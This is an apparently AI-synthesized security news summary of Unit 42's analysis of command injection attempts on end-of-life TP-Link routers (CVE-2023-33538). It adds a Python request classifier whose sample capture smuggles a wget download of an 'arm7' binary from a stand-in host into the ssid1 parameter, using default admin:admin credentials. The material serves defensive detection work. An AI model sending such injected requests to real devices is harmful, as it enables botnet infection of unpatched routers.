VYPR · kev
Published Apr 16, 2026 · Updated May 18, 2026 · 1 source

Unit 42 Details Flawed but Real Exploitation Attempts Against End-of-Life TP-Link Routers via CVE-2023-33538

Palo Alto Networks' Unit 42 has analyzed active exploitation attempts targeting CVE-2023-33538, a command injection vulnerability in end-of-life TP-Link routers, finding that while current payloads are flawed, the underlying risk remains significant due to default credential reuse.

Palo Alto Networks' Unit 42 research team has published a deep-dive analysis of active exploitation attempts targeting CVE-2023-33538, a command injection vulnerability affecting several end-of-life TP-Link Wi-Fi router models. The vulnerability, which was publicly reported in June 2023, impacts the TL-WR940N (v2 and v4), TL-WR740N (v1 and v2), and TL-WR841N (v8 and v10) routers. Unit 42 observed a surge in automated scans and probes after the Cybersecurity and Infrastructure Security Agency (CISA) added the CVE to its Known Exploited Vulnerabilities (KEV) catalog in June 2025.

The attacks target the `/userRpm/WlanNetworkRpm` endpoint, where the `ssid1` parameter is not properly sanitized, allowing command injection via HTTP GET requests. The observed exploit payloads attempt to download and execute Mirai-like botnet malware binaries, specifically an ELF binary named `arm7` from a remote IP address. The commands use `wget` to fetch the binary, `chmod 777` to make it executable, and then execute it with the parameter `tplink`. The HTTP requests use Basic Authentication with the default `admin:admin` credential encoded in Base64.

Crucially, Unit 42's analysis reveals that the in-the-wild attacks observed were flawed and would fail to successfully compromise the targeted devices. Through firmware emulation and reverse engineering of the TL-WR940N router, the researchers confirmed that the specific exploit code used in these campaigns is not effective. However, they emphasize that the underlying vulnerability is real and exploitable with properly crafted payloads.

Successful exploitation requires authentication to the router's web interface, which means attackers must either know the credentials or rely on default credentials that have not been changed. Given the widespread use of default IoT credentials, this remains a practical infection vector. The malware downloaded in these attempts is a Mirai variant similar to the Condi IoT botnet, featuring command-and-control (C2) functionality with specific byte sequences for heartbeat responses, lockdown commands, and binary updates.
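As an added example (not code from Unit 42, TP-Link or Vypr), the following Python classifies a captured HTTP request against the indicators the write-up lists: the `/userRpm/WlanNetworkRpm` endpoint, command fragments in the `ssid1` parameter, and a default `admin:admin` Basic Authentication header. The two sample captures are constructed for the example, and the 203.0.113.5 download host is a documentation address, not one from the report.

```python
import base64
from urllib.parse import unquote_plus, urlsplit

# Indicators as described in the Unit 42 analysis summarised above.
TARGET_PATH = "/userRpm/WlanNetworkRpm"
DEFAULT_CREDENTIALS = {"admin:admin"}
PAYLOAD_TOKENS = ("wget", "chmod", "arm7", "tplink")  # strings seen in the observed payloads
SHELL_METACHARS = ";|&`$"  # separators that have no place in a legitimate SSID

def parse_http_request(raw):
    """Return (request-target, lower-cased header dict) from a raw HTTP request."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in lines[1:])}
    return lines[0].split(" ", 2)[1], headers

def decode_basic_auth(header):
    """Return 'user:password' from a Basic Authorization header, or None if absent or malformed."""
    scheme, _, token = header.partition(" ")
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace") if scheme.lower() == "basic" else None
    except ValueError:  # binascii.Error on malformed base64 is a ValueError subclass
        return None

def query_param(query, name):
    """Return one decoded query parameter, splitting on '&' only so ';' inside a value survives."""
    for key, _, value in (pair.partition("=") for pair in query.split("&")):
        if unquote_plus(key) == name:
            return unquote_plus(value)
    return ""

def assess_request(raw):
    """Classify a captured request against the CVE-2023-33538 exploitation pattern."""
    target, headers = parse_http_request(raw)
    url = urlsplit(target)
    if url.path != TARGET_PATH:
        return {"verdict": "ok", "default_credentials": False, "injection_markers": []}
    creds = decode_basic_auth(headers.get("authorization", ""))
    ssid = query_param(url.query, "ssid1")  # the parameter the firmware fails to sanitise
    markers = [t for t in PAYLOAD_TOKENS if t in ssid.lower()]
    if any(c in ssid for c in SHELL_METACHARS):
        markers.append("shell-metachar")
    verdict = "exploit-attempt" if markers else ("default-credentials-only" if creds in DEFAULT_CREDENTIALS else "ok")
    return {"verdict": verdict, "default_credentials": creds in DEFAULT_CREDENTIALS, "injection_markers": markers}

# Constructed sample captures; 203.0.113.0/24 is a documentation range, not a real download host.
EXPLOIT_CAPTURE = ("GET /userRpm/WlanNetworkRpm?ssid1=home%3Bwget%20http%3A%2F%2F203.0.113.5%2Farm7 HTTP/1.1\r\n"
                   "Host: 192.168.0.1\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n")
BENIGN_CAPTURE = ("GET /userRpm/WlanNetworkRpm?ssid1=MyHomeWiFi HTTP/1.1\r\n"
                  "Host: 192.168.0.1\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n")
```

A benign configuration change made with the default password is reported separately from an injection attempt, since the report's point is that the credential, not just the payload, is what makes the vector practical.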

TP-Link has confirmed that the affected devices are end-of-life and no vendor patches are available. The company's official recommendation is for customers to replace these units with supported hardware and to ensure that default credentials are not used. This situation highlights the ongoing challenge of securing legacy IoT devices that are no longer receiving security updates, particularly when they are exposed to the internet with default credentials.

Palo Alto Networks customers are protected through several products and services, including Advanced URL Filtering, Advanced DNS Security, Advanced WildFire, Cortex Xpanse, and Next-Generation Firewalls with Advanced Threat Prevention. The research underscores the importance of proactive device lifecycle management and the risks associated with maintaining end-of-life network equipment in operational environments.

Synthesized by Vypr AI